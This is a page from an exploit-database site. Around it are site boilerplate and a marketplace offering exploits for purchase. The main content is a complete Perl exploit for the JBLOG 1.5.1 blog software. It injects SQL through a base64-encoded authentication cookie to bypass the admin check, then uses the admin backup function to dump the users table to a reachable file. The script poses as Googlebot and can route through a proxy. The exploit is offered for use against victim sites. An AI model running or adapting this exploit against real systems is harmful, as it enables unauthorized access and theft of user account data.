0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JBLOG 1.5.1 Remote SQL Table Backup Exploit
=========================================== JBLOG 1.5.1 Remote SQL Table Backup Exploit =========================================== #!/usr/bin/perl =about VENDOR JBLOG 1.5.1 (maybe earlier versions vulnerable too) http://www.lisijie.org AUTHOR discovered & written by Ams VULNERABILITY DESCRIPTION Both 'index.php' and 'admin.php' includes file 'common.php' which checks for user permission on line 81 via function 'check_user()'. This function is defined in file 'include/func_user.php'. There is another one function - 'get_cookie()' which gets cookie values. So, in cookies we put our evil string and further actions should be clear. Why we don't filter COOKIEs ? EXPLOIT WORK This exploit uses SQL-injection to create dump of users table. Actually, we are possible to do all administrator actions. REQUIREMENTS 1. You need to know prefix, by default it is 'jblog_'. But there is no problem to find it out. 2. Rights to write to 'cache/' folder. =cut use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use MIME::Base64; use Getopt::Long; Banner(); $| = 1; my $expl_url; my $prefix = 'jblog_'; my $proxy = ''; GetOptions( 'u=s' => \$expl_url, 'pre=s' => \$prefix, 'p=s' => \$proxy, ) or Usage(); my $spider = LWP::UserAgent->new; $spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); $spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) ); $spider->proxy(['http'], "http://$proxy/") if $proxy ne ''; $spider->timeout( 30 ); Exploit( $expl_url); sub Exploit { $_ = shift || Usage(); print "\n\tExploiting:\t $_"; my ($prot , $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; $prot ||= 'http'; my $url = "$prot://$host$path"; my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048'; # First request to prepare my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user"; my $res = $spider->request( $req ); my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/; # Second request to dump table $req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file"; $res = $spider->request( $req ); # Finally checking if sql backup exists $req = HEAD "$url/cache/backup/$dir/${file}_1.sql"; $res = $spider->request( $req ); if ( $res->is_success ) { print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n"; } else { printf( "\n\tFailure, server response: %s\n\tAnyway, check: %s\n", $res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql"); } } sub Usage { print <<USAGE; Usage: -u Set url of victim optional: -pre Prefix, default 'jblog_' is used if no one mentioned -p Proxy, set as ip:port Example: $0 -u=http://site.com -pre=jblog_ -p=127.0.0.1:8080 USAGE exit; } sub Banner { print <<BANNER; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ JBLOG 1.5.1 Perl exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BANNER } # 0day.today [2024-12-25] #